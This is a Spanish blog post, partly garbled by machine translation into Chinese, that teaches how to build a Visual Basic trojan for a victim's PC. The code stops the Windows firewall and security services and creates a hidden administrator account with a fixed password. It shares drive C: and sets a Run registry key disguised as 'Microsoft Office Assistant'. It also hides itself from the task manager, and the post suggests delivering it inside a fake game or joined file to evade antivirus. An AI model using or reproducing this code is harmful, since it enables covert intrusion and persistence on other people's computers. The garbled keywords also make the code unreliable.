肮脏但有效, 您对其进行编程, 你编译它, 防病毒软件没有检测到它,每个人都很高兴 ;)

Lo 第一, comandos MSDOS que nos interesan saber para después meterlos en el código de Visual Basic para ejecutar en el PC de la víctima,

COMANDO
EJEMPLO
DESCRIPCIÓN
net 用户用户名 password /ADD net user IUSR_wXP piruli /add Crea el usuario IUSR_wXP con la contraseña ‘pirulipara que cuando queramos entrar en el PC remoto ya tengamos un usuario y una contraseña
网络组名称groupusername /ADD net localgroup Administradores /add IUSR_wXP Al usuario creado anteriormente le mete en el grupo administradores, para que no tengamos problemas de permisos. Somos el administrador del PC, que más queremos!! 🙂
net stop nombredelservicio net stopFirewall de Windows/Conexión compartida a Internet (集成电路)” Sirve para detener servicios que no queremos que nos controle, por ejemplo el firewall de Windows XP, el antivirus, el Antispiware
net share nombrerecurso=Path: net share C=C: Comparte unidades de disco o el path que nos interese en el PC que se ejecute

不错, todos estos comandos, si se nos ocurren más podemos ejecutarlos en el PC del tio que nos interese entrarle en su PC (esto es cuestión de imaginación), por ejemplo con estos nos sirve para crearnos un usuario que sea Administrador, le paramos el firewall y entramos a su disco C, todo por internet y de la forma más sencilla, ahora sólo nos falta que lo ejecutey como? la mar de sencillo, lee abajo.

还行, ahora yo lo suelo hacer con Visual Basic, no soy un experto en la materia ni mucho menos, pero hago algún programilla o algún juego para el tio a hackearle y le meto estas lineas. O sino simplemente genero el programilla de VB con estas 4 lineas y con un Joinner (que es un programa que me une varios archivos se lo mando) 例如, le mando un PPS típico de txorradas y con el joinner le hago que se ejecute en segundo plano, lo malo que los joinners los detectan los antivirus, por eso prefiero hacer yo el juego con VB, aunque sea super estúpido, pero que lo ejecute.

第二, cómo hacer que se ejecute todo esto cada vez que arranque su ordenador, muy bien, entrando en el registro y generando una entrada aqui:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

哦,好吧, vamos a lo que es el código fuente de VB necesario, este sería para ejecutar los comandos de MSDOS que nos interesen, se crea una Sub con este contenido y se definen estas dos funciones arriba de todo.

Private Declare Function OpenProcess Libkernel32” (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) 只要
Private Declare Function GetExitCodeProcess Libkernel32” (ByVal hProcess 只要, lpExitCode 只要) 只要
Sub ParaServiciosYcreaUsuario()

hShell As Long
hProc As Long
codExit As Long
sCmd As String
Comando As String
Para el servicio de Centro de seguridad
&nbspComando =net stop ” & 中国(34) & “Centro de seguridad” & 中国(34)
&nbspsCmd =cmd /c ” & 命令
&nbsphShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide)
el Chr(34) son las comillas dobles, para ejecutar un commando de MSDOS que sea una frase larga necesitamos ejecutarlo con dobles comillas, pues así se pondría para que VB lo ejecute bien.
Para el servicio del Firewall de Windows
&nbspComando =net stop ” & 中国(34) & “Firewall de Windows/Conexión compartida a Internet (集成电路)” & 中国(34)
&nbspsCmd =cmd /c ” & 命令
&nbsphShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide)
Crea el usuario IUSR_wXP2
&nbspComando =net user IUSR_wXP2 Hh3rr3r01 /add
&nbspsCmd =cmd /c ” & 命令
&nbsphShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide)

Mete al usuario en el grupo de Administradores local
&nbspComando =net localgroup Administradores /add IUSR_wXP2
&nbspsCmd =cmd /c ” & 命令
&nbsphShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide)

Comparte C: su disco duro como C para que entremos x la red, aunque tambien podríamos entrar como C$
&nbspComando =net share C=C:”
&nbspsCmd =cmd /c ” & 命令
&nbsphShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide)
结束子

还行, ahora si lo que nos interesa es meterlo en el registro para que se inicie siempre que arranque el PC de la víctima y que cada vez que reinicie su PC le pare el servicio del firewall, le comparta C

Sub MeteloEnRegistro()
hregkey 只要
subkey 作为字符串
&nbspsubkey =SoftwareMicrosoftWindowsCurrentVersionRun
stringbuffer 作为字符串
PathPrograma 作为字符串
&nbspPathPrograma = “C:WINDOWSsystem32svchost32.exe
NombrePrograma 作为字符串
&nbspNombrePrograma =Microsoft Office Assistant
retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hregkey) 如果 retval <> 0 Then
Debug.PrintCan’t open the subkey
Exit Sub
End If&nbspstringbuffer = PathPrograma & vbNullChar
&nbspretval = RegSetValueEx(hregkey, NombrePrograma, 0, REG_SZ, ByVal stringbuffer, Len(stringbuffer))
&nbspRegCloseKey hregkey
结束子

Y necesitamos en un módulo meter esto:

Public Declare Function RegOpenKeyEx Libadvapi32.dll别名RegOpenKeyExA” (ByVal hKey 只要, ByVal lpSubKey 作为字符串, ByVal ulOptions 只要, ByVal samDesired 只要, phkResult 只要) 只要
Public Declare Function RegCloseKey Libadvapi32.dll” (ByVal hKey 只要) 只要
Public Declare Function RegSetValueEx Libadvapi32.dll别名RegSetValueExA” (ByVal hKey 只要, ByVal lpValueName 作为字符串, ByVal Reserved 只要, ByVal dwType 只要, lpData As Any, ByVal cbData 只要) 只要
Public Const HKEY_CURRENT_USER = &H80000001
Public Const KEY_WRITE = &H20006
Public Const REG_SZ = 1

Puedes descargarte el código fuente completo de 这里. Si tenéis alguna sugerencia es pedirlo o decirlo!

Personalmente me gusta poner esto al principio, cuando se carga la aplicación, es para que el usuario no lo vea ni en pantalla ni en el “任务管理器” que suele ser perfecto para que no nos mate el proceso.

Me.Visible =
App.TaskVisible =


推荐文章

作者

nheobug@bujarra.com
Autor del blog Bujarra.com Cualquier necesidad que tengas, 请随时与我联系, 我会尽我所能帮助你, 分享就是生活 ;) . 享受文档!!!

Keylogger casero (propio)

28 十月 2008

X-Scan 漏洞扫描程序

28 十月 2008